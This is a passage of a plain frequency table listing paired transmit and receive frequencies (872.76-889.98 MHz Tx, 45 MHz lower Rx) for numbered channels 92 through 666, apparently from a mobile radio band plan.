Tx 872.76 Rx 827.76 Chan 0092 #92
Tx 872.79 Rx 827.79 Chan 0093 #93
Tx 872.82 Rx 827.82 Chan 0094 #94
Tx 872.85 Rx 827.85 Chan 0095 #95
Tx 872.88 Rx 827.88 Chan 0096 #96
Tx 872.91 Rx 827.91 Chan 0097 #97
Tx 872.94 Rx 827.94 Chan 0098 #98
Tx 872.97 Rx 827.97 Chan 0099 #99
Tx 873.00 Rx 828.00 Chan 0100 #100
Tx 873.03 Rx 828.03 Chan 0101 #101
Tx 873.06 Rx 828.06 Chan 0102 #102
Tx 873.09 Rx 828.09 Chan 0103 #103
Tx 873.12 Rx 828.12 Chan 0104 #104
Tx 873.15 Rx 828.15 Chan 0105 #105
Tx 873.18 Rx 828.18 Chan 0106 #106
Tx 873.21 Rx 828.21 Chan 0107 #107
Tx 873.24 Rx 828.24 Chan 0108 #108
Tx 873.27 Rx 828.27 Chan 0109 #109
Tx 873.30 Rx 828.30 Chan 0110 #110
Tx 873.33 Rx 828.33 Chan 0111 #111
Tx 873.36 Rx 828.36 Chan 0112 #112
Tx 873.39 Rx 828.39 Chan 0113 #113
Tx 873.42 Rx 828.42 Chan 0114 #114
Tx 873.45 Rx 828.45 Chan 0115 #115
Tx 873.48 Rx 828.48 Chan 0116 #116
Tx 873.51 Rx 828.51 Chan 0117 #117
Tx 873.54 Rx 828.54 Chan 0118 #118
Tx 873.57 Rx 828.57 Chan 0119 #119
Tx 873.60 Rx 828.60 Chan 0120 #120
Tx 873.63 Rx 828.63 Chan 0121 #121
Tx 873.66 Rx 828.66 Chan 0122 #122
Tx 873.69 Rx 828.69 Chan 0123 #123
Tx 873.72 Rx 828.72 Chan 0124 #124
Tx 873.75 Rx 828.75 Chan 0125 #125
Tx 873.78 Rx 828.78 Chan 0126 #126
Tx 873.81 Rx 828.81 Chan 0127 #127
Tx 873.84 Rx 828.84 Chan 0128 #128
Tx 873.87 Rx 828.87 Chan 0129 #129
Tx 873.90 Rx 828.90 Chan 0130 #130
Tx 873.93 Rx 828.93 Chan 0131 #131
Tx 873.96 Rx 828.96 Chan 0132 #132
Tx 873.99 Rx 828.99 Chan 0133 #133
Tx 874.02 Rx 829.02 Chan 0134 #134
Tx 874.05 Rx 829.05 Chan 0135 #135
Tx 874.08 Rx 829.08 Chan 0136 #136
Tx 874.11 Rx 829.11 Chan 0137 #137
Tx 874.14 Rx 829.14 Chan 0138 #138
Tx 874.17 Rx 829.17 Chan 0139 #139
Tx 874.20 Rx 829.20 Chan 0140 #140
Tx 874.23 Rx 829.23 Chan 0141 #141
Tx 874.26 Rx 829.26 Chan 0142 #142
Tx 874.29 Rx 829.29 Chan 0143 #143
Tx 874.32 Rx 829.32 Chan 0144 #144
Tx 874.35 Rx 829.35 Chan 0145 #145
Tx 874.38 Rx 829.38 Chan 0146 #146
Tx 874.41 Rx 829.41 Chan 0147 #147
Tx 874.44 Rx 829.44 Chan 0148 #148
Tx 874.47 Rx 829.47 Chan 0149 #149
Tx 874.50 Rx 829.50 Chan 0150 #150
Tx 874.53 Rx 829.53 Chan 0151 #151
Tx 874.56 Rx 829.56 Chan 0152 #152
Tx 874.59 Rx 829.59 Chan 0153 #153
Tx 874.62 Rx 829.62 Chan 0154 #154
Tx 874.65 Rx 829.65 Chan 0155 #155
Tx 874.68 Rx 829.68 Chan 0156 #156
Tx 874.71 Rx 829.71 Chan 0157 #157
Tx 874.74 Rx 829.74 Chan 0158 #158
Tx 874.77 Rx 829.77 Chan 0159 #159
Tx 874.80 Rx 829.80 Chan 0160 #160
Tx 874.83 Rx 829.83 Chan 0161 #161
Tx 874.86 Rx 829.86 Chan 0162 #162
Tx 874.89 Rx 829.89 Chan 0163 #163
Tx 874.92 Rx 829.92 Chan 0164 #164
Tx 874.95 Rx 829.95 Chan 0165 #165
Tx 874.98 Rx 829.98 Chan 0166 #166
Tx 875.01 Rx 830.01 Chan 0167 #167
Tx 875.04 Rx 830.04 Chan 0168 #168
Tx 875.07 Rx 830.07 Chan 0169 #169
Tx 875.10 Rx 830.10 Chan 0170 #170
Tx 875.13 Rx 830.13 Chan 0171 #171
Tx 875.16 Rx 830.16 Chan 0172 #172
Tx 875.19 Rx 830.19 Chan 0173 #173
Tx 875.22 Rx 830.22 Chan 0174 #174
Tx 875.25 Rx 830.25 Chan 0175 #175
Tx 875.28 Rx 830.28 Chan 0176 #176
Tx 875.31 Rx 830.31 Chan 0177 #177
Tx 875.34 Rx 830.34 Chan 0178 #178
Tx 875.37 Rx 830.37 Chan 0179 #179
Tx 875.40 Rx 830.40 Chan 0180 #180
Tx 875.43 Rx 830.43 Chan 0181 #181
Tx 875.46 Rx 830.46 Chan 0182 #182
Tx 875.49 Rx 830.49 Chan 0183 #183
Tx 875.52 Rx 830.52 Chan 0184 #184
Tx 875.55 Rx 830.55 Chan 0185 #185
Tx 875.58 Rx 830.58 Chan 0186 #186
Tx 875.61 Rx 830.61 Chan 0187 #187
Tx 875.64 Rx 830.64 Chan 0188 #188
Tx 875.67 Rx 830.67 Chan 0189 #189
Tx 875.70 Rx 830.70 Chan 0190 #190
Tx 875.73 Rx 830.73 Chan 0191 #191
Tx 875.76 Rx 830.76 Chan 0192 #192
Tx 875.79 Rx 830.79 Chan 0193 #193
Tx 875.82 Rx 830.82 Chan 0194 #194
Tx 875.85 Rx 830.85 Chan 0195 #195
Tx 875.88 Rx 830.88 Chan 0196 #196
Tx 875.91 Rx 830.91 Chan 0197 #197
Tx 875.94 Rx 830.94 Chan 0198 #198
Tx 875.97 Rx 830.97 Chan 0199 #199
Tx 876.00 Rx 831.00 Chan 0200 #200
Tx 876.03 Rx 831.03 Chan 0201 #201
Tx 876.06 Rx 831.06 Chan 0202 #202
Tx 876.09 Rx 831.09 Chan 0203 #203
Tx 876.12 Rx 831.12 Chan 0204 #204
Tx 876.15 Rx 831.15 Chan 0205 #205
Tx 876.18 Rx 831.18 Chan 0206 #206
Tx 876.21 Rx 831.21 Chan 0207 #207
Tx 876.24 Rx 831.24 Chan 0208 #208
Tx 876.27 Rx 831.27 Chan 0209 #209
Tx 876.30 Rx 831.30 Chan 0210 #210
Tx 876.33 Rx 831.33 Chan 0211 #211
Tx 876.36 Rx 831.36 Chan 0212 #212
Tx 876.39 Rx 831.39 Chan 0213 #213
Tx 876.42 Rx 831.42 Chan 0214 #214
Tx 876.45 Rx 831.45 Chan 0215 #215
Tx 876.48 Rx 831.48 Chan 0216 #216
Tx 876.51 Rx 831.51 Chan 0217 #217
Tx 876.54 Rx 831.54 Chan 0218 #218
Tx 876.57 Rx 831.57 Chan 0219 #219
Tx 876.60 Rx 831.60 Chan 0220 #220
Tx 876.63 Rx 831.63 Chan 0221 #221
Tx 876.66 Rx 831.66 Chan 0222 #222
Tx 876.69 Rx 831.69 Chan 0223 #223
Tx 876.72 Rx 831.72 Chan 0224 #224
Tx 876.75 Rx 831.75 Chan 0225 #225
Tx 876.78 Rx 831.78 Chan 0226 #226
Tx 876.81 Rx 831.81 Chan 0227 #227
Tx 876.84 Rx 831.84 Chan 0228 #228
Tx 876.87 Rx 831.87 Chan 0229 #229
Tx 876.90 Rx 831.90 Chan 0230 #230
Tx 876.93 Rx 831.93 Chan 0231 #231
Tx 876.96 Rx 831.96 Chan 0232 #232
Tx 876.99 Rx 831.99 Chan 0233 #233
Tx 877.02 Rx 832.02 Chan 0234 #234
Tx 877.05 Rx 832.05 Chan 0235 #235
Tx 877.08 Rx 832.08 Chan 0236 #236
Tx 877.11 Rx 832.11 Chan 0237 #237
Tx 877.14 Rx 832.14 Chan 0238 #238
Tx 877.17 Rx 832.17 Chan 0239 #239
Tx 877.20 Rx 832.20 Chan 0240 #240
Tx 877.23 Rx 832.23 Chan 0241 #241
Tx 877.26 Rx 832.26 Chan 0242 #242
Tx 877.29 Rx 832.29 Chan 0243 #243
Tx 877.32 Rx 832.32 Chan 0244 #244
Tx 877.35 Rx 832.35 Chan 0245 #245
Tx 877.38 Rx 832.38 Chan 0246 #246
Tx 877.41 Rx 832.41 Chan 0247 #247
Tx 877.44 Rx 832.44 Chan 0248 #248
Tx 877.47 Rx 832.47 Chan 0249 #249
Tx 877.50 Rx 832.50 Chan 0250 #250
Tx 877.53 Rx 832.53 Chan 0251 #251
Tx 877.56 Rx 832.56 Chan 0252 #252
Tx 877.59 Rx 832.59 Chan 0253 #253
Tx 877.62 Rx 832.62 Chan 0254 #254
Tx 877.65 Rx 832.65 Chan 0255 #255
Tx 877.68 Rx 832.68 Chan 0256 #256
Tx 877.71 Rx 832.71 Chan 0257 #257
Tx 877.74 Rx 832.74 Chan 0258 #258
Tx 877.77 Rx 832.77 Chan 0259 #259
Tx 877.80 Rx 832.80 Chan 0260 #260
Tx 877.83 Rx 832.83 Chan 0261 #261
Tx 877.86 Rx 832.86 Chan 0262 #262
Tx 877.89 Rx 832.89 Chan 0263 #263
Tx 877.92 Rx 832.92 Chan 0264 #264
Tx 877.95 Rx 832.95 Chan 0265 #265
Tx 877.98 Rx 832.98 Chan 0266 #266
Tx 878.01 Rx 833.01 Chan 0267 #267
Tx 878.04 Rx 833.04 Chan 0268 #268
Tx 878.07 Rx 833.07 Chan 0269 #269
Tx 878.10 Rx 833.10 Chan 0270 #270
Tx 878.13 Rx 833.13 Chan 0271 #271
Tx 878.16 Rx 833.16 Chan 0272 #272
Tx 878.19 Rx 833.19 Chan 0273 #273
Tx 878.22 Rx 833.22 Chan 0274 #274
Tx 878.25 Rx 833.25 Chan 0275 #275
Tx 878.28 Rx 833.28 Chan 0276 #276
Tx 878.31 Rx 833.31 Chan 0277 #277
Tx 878.34 Rx 833.34 Chan 0278 #278
Tx 878.37 Rx 833.37 Chan 0279 #279
Tx 878.40 Rx 833.40 Chan 0280 #280
Tx 878.43 Rx 833.43 Chan 0281 #281
Tx 878.46 Rx 833.46 Chan 0282 #282
Tx 878.49 Rx 833.49 Chan 0283 #283
Tx 878.52 Rx 833.52 Chan 0284 #284
Tx 878.55 Rx 833.55 Chan 0285 #285
Tx 878.58 Rx 833.58 Chan 0286 #286
Tx 878.61 Rx 833.61 Chan 0287 #287
Tx 878.64 Rx 833.64 Chan 0288 #288
Tx 878.67 Rx 833.67 Chan 0289 #289
Tx 878.70 Rx 833.70 Chan 0290 #290
Tx 878.73 Rx 833.73 Chan 0291 #291
Tx 878.76 Rx 833.76 Chan 0292 #292
Tx 878.79 Rx 833.79 Chan 0293 #293
Tx 878.82 Rx 833.82 Chan 0294 #294
Tx 878.85 Rx 833.85 Chan 0295 #295
Tx 878.88 Rx 833.88 Chan 0296 #296
Tx 878.91 Rx 833.91 Chan 0297 #297
Tx 878.94 Rx 833.94 Chan 0298 #298
Tx 878.97 Rx 833.97 Chan 0299 #299
Tx 879.00 Rx 834.00 Chan 0300 #300
Tx 879.03 Rx 834.03 Chan 0301 #301
Tx 879.06 Rx 834.06 Chan 0302 #302
Tx 879.09 Rx 834.09 Chan 0303 #303
Tx 879.12 Rx 834.12 Chan 0304 #304
Tx 879.15 Rx 834.15 Chan 0305 #305
Tx 879.18 Rx 834.18 Chan 0306 #306
Tx 879.21 Rx 834.21 Chan 0307 #307
Tx 879.24 Rx 834.24 Chan 0308 #308
Tx 879.27 Rx 834.27 Chan 0309 #309
Tx 879.30 Rx 834.30 Chan 0310 #310
Tx 879.33 Rx 834.33 Chan 0311 #311
Tx 879.36 Rx 834.36 Chan 0312 #312
Tx 879.39 Rx 834.39 Chan 0313 #313
Tx 879.42 Rx 834.42 Chan 0314 #314
Tx 879.45 Rx 834.45 Chan 0315 #315
Tx 879.48 Rx 834.48 Chan 0316 #316
Tx 879.51 Rx 834.51 Chan 0317 #317
Tx 879.54 Rx 834.54 Chan 0318 #318
Tx 879.57 Rx 834.57 Chan 0319 #319
Tx 879.60 Rx 834.60 Chan 0320 #320
Tx 879.63 Rx 834.63 Chan 0321 #321
Tx 879.66 Rx 834.66 Chan 0322 #322
Tx 879.69 Rx 834.69 Chan 0323 #323
Tx 879.72 Rx 834.72 Chan 0324 #324
Tx 879.75 Rx 834.75 Chan 0325 #325
Tx 879.78 Rx 834.78 Chan 0326 #326
Tx 879.81 Rx 834.81 Chan 0327 #327
Tx 879.84 Rx 834.84 Chan 0328 #328
Tx 879.87 Rx 834.87 Chan 0329 #329
Tx 879.90 Rx 834.90 Chan 0330 #330
Tx 879.93 Rx 834.93 Chan 0331 #331
Tx 879.96 Rx 834.96 Chan 0332 #332
Tx 879.99 Rx 834.99 Chan 0333 #333
Tx 880.02 Rx 835.02 Chan 0334 #334
Tx 880.05 Rx 835.05 Chan 0335 #335
Tx 880.08 Rx 835.08 Chan 0336 #336
Tx 880.11 Rx 835.11 Chan 0337 #337
Tx 880.14 Rx 835.14 Chan 0338 #338
Tx 880.17 Rx 835.17 Chan 0339 #339
Tx 880.20 Rx 835.20 Chan 0340 #340
Tx 880.23 Rx 835.23 Chan 0341 #341
Tx 880.26 Rx 835.26 Chan 0342 #342
Tx 880.29 Rx 835.29 Chan 0343 #343
Tx 880.32 Rx 835.32 Chan 0344 #344
Tx 880.35 Rx 835.35 Chan 0345 #345
Tx 880.38 Rx 835.38 Chan 0346 #346
Tx 880.41 Rx 835.41 Chan 0347 #347
Tx 880.44 Rx 835.44 Chan 0348 #348
Tx 880.47 Rx 835.47 Chan 0349 #349
Tx 880.50 Rx 835.50 Chan 0350 #350
Tx 880.53 Rx 835.53 Chan 0351 #351
Tx 880.56 Rx 835.56 Chan 0352 #352
Tx 880.59 Rx 835.59 Chan 0353 #353
Tx 880.62 Rx 835.62 Chan 0354 #354
Tx 880.65 Rx 835.65 Chan 0355 #355
Tx 880.68 Rx 835.68 Chan 0356 #356
Tx 880.71 Rx 835.71 Chan 0357 #357
Tx 880.74 Rx 835.74 Chan 0358 #358
Tx 880.77 Rx 835.77 Chan 0359 #359
Tx 880.80 Rx 835.80 Chan 0360 #360
Tx 880.83 Rx 835.83 Chan 0361 #361
Tx 880.86 Rx 835.86 Chan 0362 #362
Tx 880.89 Rx 835.89 Chan 0363 #363
Tx 880.92 Rx 835.92 Chan 0364 #364
Tx 880.95 Rx 835.95 Chan 0365 #365
Tx 880.98 Rx 835.98 Chan 0366 #366
Tx 881.01 Rx 836.01 Chan 0367 #367
Tx 881.04 Rx 836.04 Chan 0368 #368
Tx 881.07 Rx 836.07 Chan 0369 #369
Tx 881.10 Rx 836.10 Chan 0370 #370
Tx 881.13 Rx 836.13 Chan 0371 #371
Tx 881.16 Rx 836.16 Chan 0372 #372
Tx 881.19 Rx 836.19 Chan 0373 #373
Tx 881.22 Rx 836.22 Chan 0374 #374
Tx 881.25 Rx 836.25 Chan 0375 #375
Tx 881.28 Rx 836.28 Chan 0376 #376
Tx 881.31 Rx 836.31 Chan 0377 #377
Tx 881.34 Rx 836.34 Chan 0378 #378
Tx 881.37 Rx 836.37 Chan 0379 #379
Tx 881.40 Rx 836.40 Chan 0380 #380
Tx 881.43 Rx 836.43 Chan 0381 #381
Tx 881.46 Rx 836.46 Chan 0382 #382
Tx 881.49 Rx 836.49 Chan 0383 #383
Tx 881.52 Rx 836.52 Chan 0384 #384
Tx 881.55 Rx 836.55 Chan 0385 #385
Tx 881.58 Rx 836.58 Chan 0386 #386
Tx 881.61 Rx 836.61 Chan 0387 #387
Tx 881.64 Rx 836.64 Chan 0388 #388
Tx 881.67 Rx 836.67 Chan 0389 #389
Tx 881.70 Rx 836.70 Chan 0390 #390
Tx 881.73 Rx 836.73 Chan 0391 #391
Tx 881.76 Rx 836.76 Chan 0392 #392
Tx 881.79 Rx 836.79 Chan 0393 #393
Tx 881.82 Rx 836.82 Chan 0394 #394
Tx 881.85 Rx 836.85 Chan 0395 #395
Tx 881.88 Rx 836.88 Chan 0396 #396
Tx 881.91 Rx 836.91 Chan 0397 #397
Tx 881.94 Rx 836.94 Chan 0398 #398
Tx 881.97 Rx 836.97 Chan 0399 #399
Tx 882.00 Rx 837.00 Chan 0400 #400
Tx 882.03 Rx 837.03 Chan 0401 #401
Tx 882.06 Rx 837.06 Chan 0402 #402
Tx 882.09 Rx 837.09 Chan 0403 #403
Tx 882.12 Rx 837.12 Chan 0404 #404
Tx 882.15 Rx 837.15 Chan 0405 #405
Tx 882.18 Rx 837.18 Chan 0406 #406
Tx 882.21 Rx 837.21 Chan 0407 #407
Tx 882.24 Rx 837.24 Chan 0408 #408
Tx 882.27 Rx 837.27 Chan 0409 #409
Tx 882.30 Rx 837.30 Chan 0410 #410
Tx 882.33 Rx 837.33 Chan 0411 #411
Tx 882.36 Rx 837.36 Chan 0412 #412
Tx 882.39 Rx 837.39 Chan 0413 #413
Tx 882.42 Rx 837.42 Chan 0414 #414
Tx 882.45 Rx 837.45 Chan 0415 #415
Tx 882.48 Rx 837.48 Chan 0416 #416
Tx 882.51 Rx 837.51 Chan 0417 #417
Tx 882.54 Rx 837.54 Chan 0418 #418
Tx 882.57 Rx 837.57 Chan 0419 #419
Tx 882.60 Rx 837.60 Chan 0420 #420
Tx 882.63 Rx 837.63 Chan 0421 #421
Tx 882.66 Rx 837.66 Chan 0422 #422
Tx 882.69 Rx 837.69 Chan 0423 #423
Tx 882.72 Rx 837.72 Chan 0424 #424
Tx 882.75 Rx 837.75 Chan 0425 #425
Tx 882.78 Rx 837.78 Chan 0426 #426
Tx 882.81 Rx 837.81 Chan 0427 #427
Tx 882.84 Rx 837.84 Chan 0428 #428
Tx 882.87 Rx 837.87 Chan 0429 #429
Tx 882.90 Rx 837.90 Chan 0430 #430
Tx 882.93 Rx 837.93 Chan 0431 #431
Tx 882.96 Rx 837.96 Chan 0432 #432
Tx 882.99 Rx 837.99 Chan 0433 #433
Tx 883.02 Rx 838.02 Chan 0434 #434
Tx 883.05 Rx 838.05 Chan 0435 #435
Tx 883.08 Rx 838.08 Chan 0436 #436
Tx 883.11 Rx 838.11 Chan 0437 #437
Tx 883.14 Rx 838.14 Chan 0438 #438
Tx 883.17 Rx 838.17 Chan 0439 #439
Tx 883.20 Rx 838.20 Chan 0440 #440
Tx 883.23 Rx 838.23 Chan 0441 #441
Tx 883.26 Rx 838.26 Chan 0442 #442
Tx 883.29 Rx 838.29 Chan 0443 #443
Tx 883.32 Rx 838.32 Chan 0444 #444
Tx 883.35 Rx 838.35 Chan 0445 #445
Tx 883.38 Rx 838.38 Chan 0446 #446
Tx 883.41 Rx 838.41 Chan 0447 #447
Tx 883.44 Rx 838.44 Chan 0448 #448
Tx 883.47 Rx 838.47 Chan 0449 #449
Tx 883.50 Rx 838.50 Chan 0450 #450
Tx 883.53 Rx 838.53 Chan 0451 #451
Tx 883.56 Rx 838.56 Chan 0452 #452
Tx 883.59 Rx 838.59 Chan 0453 #453
Tx 883.62 Rx 838.62 Chan 0454 #454
Tx 883.65 Rx 838.65 Chan 0455 #455
Tx 883.68 Rx 838.68 Chan 0456 #456
Tx 883.71 Rx 838.71 Chan 0457 #457
Tx 883.74 Rx 838.74 Chan 0458 #458
Tx 883.77 Rx 838.77 Chan 0459 #459
Tx 883.80 Rx 838.80 Chan 0460 #460
Tx 883.83 Rx 838.83 Chan 0461 #461
Tx 883.86 Rx 838.86 Chan 0462 #462
Tx 883.89 Rx 838.89 Chan 0463 #463
Tx 883.92 Rx 838.92 Chan 0464 #464
Tx 883.95 Rx 838.95 Chan 0465 #465
Tx 883.98 Rx 838.98 Chan 0466 #466
Tx 884.01 Rx 839.01 Chan 0467 #467
Tx 884.04 Rx 839.04 Chan 0468 #468
Tx 884.07 Rx 839.07 Chan 0469 #469
Tx 884.10 Rx 839.10 Chan 0470 #470
Tx 884.13 Rx 839.13 Chan 0471 #471
Tx 884.16 Rx 839.16 Chan 0472 #472
Tx 884.19 Rx 839.19 Chan 0473 #473
Tx 884.22 Rx 839.22 Chan 0474 #474
Tx 884.25 Rx 839.25 Chan 0475 #475
Tx 884.28 Rx 839.28 Chan 0476 #476
Tx 884.31 Rx 839.31 Chan 0477 #477
Tx 884.34 Rx 839.34 Chan 0478 #478
Tx 884.37 Rx 839.37 Chan 0479 #479
Tx 884.40 Rx 839.40 Chan 0480 #480
Tx 884.43 Rx 839.43 Chan 0481 #481
Tx 884.46 Rx 839.46 Chan 0482 #482
Tx 884.49 Rx 839.49 Chan 0483 #483
Tx 884.52 Rx 839.52 Chan 0484 #484
Tx 884.55 Rx 839.55 Chan 0485 #485
Tx 884.58 Rx 839.58 Chan 0486 #486
Tx 884.61 Rx 839.61 Chan 0487 #487
Tx 884.64 Rx 839.64 Chan 0488 #488
Tx 884.67 Rx 839.67 Chan 0489 #489
Tx 884.70 Rx 839.70 Chan 0490 #490
Tx 884.73 Rx 839.73 Chan 0491 #491
Tx 884.76 Rx 839.76 Chan 0492 #492
Tx 884.79 Rx 839.79 Chan 0493 #493
Tx 884.82 Rx 839.82 Chan 0494 #494
Tx 884.85 Rx 839.85 Chan 0495 #495
Tx 884.88 Rx 839.88 Chan 0496 #496
Tx 884.91 Rx 839.91 Chan 0497 #497
Tx 884.94 Rx 839.94 Chan 0498 #498
Tx 884.97 Rx 839.97 Chan 0499 #499
Tx 885.00 Rx 840.00 Chan 0500 #500
Tx 885.03 Rx 840.03 Chan 0501 #501
Tx 885.06 Rx 840.06 Chan 0502 #502
Tx 885.09 Rx 840.09 Chan 0503 #503
Tx 885.12 Rx 840.12 Chan 0504 #504
Tx 885.15 Rx 840.15 Chan 0505 #505
Tx 885.18 Rx 840.18 Chan 0506 #506
Tx 885.21 Rx 840.21 Chan 0507 #507
Tx 885.24 Rx 840.24 Chan 0508 #508
Tx 885.27 Rx 840.27 Chan 0509 #509
Tx 885.30 Rx 840.30 Chan 0510 #510
Tx 885.33 Rx 840.33 Chan 0511 #511
Tx 885.36 Rx 840.36 Chan 0512 #512
Tx 885.39 Rx 840.39 Chan 0513 #513
Tx 885.42 Rx 840.42 Chan 0514 #514
Tx 885.45 Rx 840.45 Chan 0515 #515
Tx 885.48 Rx 840.48 Chan 0516 #516
Tx 885.51 Rx 840.51 Chan 0517 #517
Tx 885.54 Rx 840.54 Chan 0518 #518
Tx 885.57 Rx 840.57 Chan 0519 #519
Tx 885.60 Rx 840.60 Chan 0520 #520
Tx 885.63 Rx 840.63 Chan 0521 #521
Tx 885.66 Rx 840.66 Chan 0522 #522
Tx 885.69 Rx 840.69 Chan 0523 #523
Tx 885.72 Rx 840.72 Chan 0524 #524
Tx 885.75 Rx 840.75 Chan 0525 #525
Tx 885.78 Rx 840.78 Chan 0526 #526
Tx 885.81 Rx 840.81 Chan 0527 #527
Tx 885.84 Rx 840.84 Chan 0528 #528
Tx 885.87 Rx 840.87 Chan 0529 #529
Tx 885.90 Rx 840.90 Chan 0530 #530
Tx 885.93 Rx 840.93 Chan 0531 #531
Tx 885.96 Rx 840.96 Chan 0532 #532
Tx 885.99 Rx 840.99 Chan 0533 #533
Tx 886.02 Rx 841.02 Chan 0534 #534
Tx 886.05 Rx 841.05 Chan 0535 #535
Tx 886.08 Rx 841.08 Chan 0536 #536
Tx 886.11 Rx 841.11 Chan 0537 #537
Tx 886.14 Rx 841.14 Chan 0538 #538
Tx 886.17 Rx 841.17 Chan 0539 #539
Tx 886.20 Rx 841.20 Chan 0540 #540
Tx 886.23 Rx 841.23 Chan 0541 #541
Tx 886.26 Rx 841.26 Chan 0542 #542
Tx 886.29 Rx 841.29 Chan 0543 #543
Tx 886.32 Rx 841.32 Chan 0544 #544
Tx 886.35 Rx 841.35 Chan 0545 #545
Tx 886.38 Rx 841.38 Chan 0546 #546
Tx 886.41 Rx 841.41 Chan 0547 #547
Tx 886.44 Rx 841.44 Chan 0548 #548
Tx 886.47 Rx 841.47 Chan 0549 #549
Tx 886.50 Rx 841.50 Chan 0550 #550
Tx 886.53 Rx 841.53 Chan 0551 #551
Tx 886.56 Rx 841.56 Chan 0552 #552
Tx 886.59 Rx 841.59 Chan 0553 #553
Tx 886.62 Rx 841.62 Chan 0554 #554
Tx 886.65 Rx 841.65 Chan 0555 #555
Tx 886.68 Rx 841.68 Chan 0556 #556
Tx 886.71 Rx 841.71 Chan 0557 #557
Tx 886.74 Rx 841.74 Chan 0558 #558
Tx 886.77 Rx 841.77 Chan 0559 #559
Tx 886.80 Rx 841.80 Chan 0560 #560
Tx 886.83 Rx 841.83 Chan 0561 #561
Tx 886.86 Rx 841.86 Chan 0562 #562
Tx 886.89 Rx 841.89 Chan 0563 #563
Tx 886.92 Rx 841.92 Chan 0564 #564
Tx 886.95 Rx 841.95 Chan 0565 #565
Tx 886.98 Rx 841.98 Chan 0566 #566
Tx 887.01 Rx 842.01 Chan 0567 #567
Tx 887.04 Rx 842.04 Chan 0568 #568
Tx 887.07 Rx 842.07 Chan 0569 #569
Tx 887.10 Rx 842.10 Chan 0570 #570
Tx 887.13 Rx 842.13 Chan 0571 #571
Tx 887.16 Rx 842.16 Chan 0572 #572
Tx 887.19 Rx 842.19 Chan 0573 #573
Tx 887.22 Rx 842.22 Chan 0574 #574
Tx 887.25 Rx 842.25 Chan 0575 #575
Tx 887.28 Rx 842.28 Chan 0576 #576
Tx 887.31 Rx 842.31 Chan 0577 #577
Tx 887.34 Rx 842.34 Chan 0578 #578
Tx 887.37 Rx 842.37 Chan 0579 #579
Tx 887.40 Rx 842.40 Chan 0580 #580
Tx 887.43 Rx 842.43 Chan 0581 #581
Tx 887.46 Rx 842.46 Chan 0582 #582
Tx 887.49 Rx 842.49 Chan 0583 #583
Tx 887.52 Rx 842.52 Chan 0584 #584
Tx 887.55 Rx 842.55 Chan 0585 #585
Tx 887.58 Rx 842.58 Chan 0586 #586
Tx 887.61 Rx 842.61 Chan 0587 #587
Tx 887.64 Rx 842.64 Chan 0588 #588
Tx 887.67 Rx 842.67 Chan 0589 #589
Tx 887.70 Rx 842.70 Chan 0590 #590
Tx 887.73 Rx 842.73 Chan 0591 #591
Tx 887.76 Rx 842.76 Chan 0592 #592
Tx 887.79 Rx 842.79 Chan 0593 #593
Tx 887.82 Rx 842.82 Chan 0594 #594
Tx 887.85 Rx 842.85 Chan 0595 #595
Tx 887.88 Rx 842.88 Chan 0596 #596
Tx 887.91 Rx 842.91 Chan 0597 #597
Tx 887.94 Rx 842.94 Chan 0598 #598
Tx 887.97 Rx 842.97 Chan 0599 #599
Tx 888.00 Rx 843.00 Chan 0600 #600
Tx 888.03 Rx 843.03 Chan 0601 #601
Tx 888.06 Rx 843.06 Chan 0602 #602
Tx 888.09 Rx 843.09 Chan 0603 #603
Tx 888.12 Rx 843.12 Chan 0604 #604
Tx 888.15 Rx 843.15 Chan 0605 #605
Tx 888.18 Rx 843.18 Chan 0606 #606
Tx 888.21 Rx 843.21 Chan 0607 #607
Tx 888.24 Rx 843.24 Chan 0608 #608
Tx 888.27 Rx 843.27 Chan 0609 #609
Tx 888.30 Rx 843.30 Chan 0610 #610
Tx 888.33 Rx 843.33 Chan 0611 #611
Tx 888.36 Rx 843.36 Chan 0612 #612
Tx 888.39 Rx 843.39 Chan 0613 #613
Tx 888.42 Rx 843.42 Chan 0614 #614
Tx 888.45 Rx 843.45 Chan 0615 #615
Tx 888.48 Rx 843.48 Chan 0616 #616
Tx 888.51 Rx 843.51 Chan 0617 #617
Tx 888.54 Rx 843.54 Chan 0618 #618
Tx 888.57 Rx 843.57 Chan 0619 #619
Tx 888.60 Rx 843.60 Chan 0620 #620
Tx 888.63 Rx 843.63 Chan 0621 #621
Tx 888.66 Rx 843.66 Chan 0622 #622
Tx 888.69 Rx 843.69 Chan 0623 #623
Tx 888.72 Rx 843.72 Chan 0624 #624
Tx 888.75 Rx 843.75 Chan 0625 #625
Tx 888.78 Rx 843.78 Chan 0626 #626
Tx 888.81 Rx 843.81 Chan 0627 #627
Tx 888.84 Rx 843.84 Chan 0628 #628
Tx 888.87 Rx 843.87 Chan 0629 #629
Tx 888.90 Rx 843.90 Chan 0630 #630
Tx 888.93 Rx 843.93 Chan 0631 #631
Tx 888.96 Rx 843.96 Chan 0632 #632
Tx 888.99 Rx 843.99 Chan 0633 #633
Tx 889.02 Rx 844.02 Chan 0634 #634
Tx 889.05 Rx 844.05 Chan 0635 #635
Tx 889.08 Rx 844.08 Chan 0636 #636
Tx 889.11 Rx 844.11 Chan 0637 #637
Tx 889.14 Rx 844.14 Chan 0638 #638
Tx 889.17 Rx 844.17 Chan 0639 #639
Tx 889.20 Rx 844.20 Chan 0640 #640
Tx 889.23 Rx 844.23 Chan 0641 #641
Tx 889.26 Rx 844.26 Chan 0642 #642
Tx 889.29 Rx 844.29 Chan 0643 #643
Tx 889.32 Rx 844.32 Chan 0644 #644
Tx 889.35 Rx 844.35 Chan 0645 #645
Tx 889.38 Rx 844.38 Chan 0646 #646
Tx 889.41 Rx 844.41 Chan 0647 #647
Tx 889.44 Rx 844.44 Chan 0648 #648
Tx 889.47 Rx 844.47 Chan 0649 #649
Tx 889.50 Rx 844.50 Chan 0650 #650
Tx 889.53 Rx 844.53 Chan 0651 #651
Tx 889.56 Rx 844.56 Chan 0652 #652
Tx 889.59 Rx 844.59 Chan 0653 #653
Tx 889.62 Rx 844.62 Chan 0654 #654
Tx 889.65 Rx 844.65 Chan 0655 #655
Tx 889.68 Rx 844.68 Chan 0656 #656
Tx 889.71 Rx 844.71 Chan 0657 #657
Tx 889.74 Rx 844.74 Chan 0658 #658
Tx 889.77 Rx 844.77 Chan 0659 #659
Tx 889.80 Rx 844.80 Chan 0660 #660
Tx 889.83 Rx 844.83 Chan 0661 #661
Tx 889.86 Rx 844.86 Chan 0662 #662
Tx 889.89 Rx 844.89 Chan 0663 #663
Tx 889.92 Rx 844.92 Chan 0664 #664
Tx 889.95 Rx 844.95 Chan 0665 #665
Tx 889.98 Rx 844.98 Chan 0666 #666
Upper Set Part 1 (667-799)
Tower Freq. Mobile Freq. 11xxxx# Channel
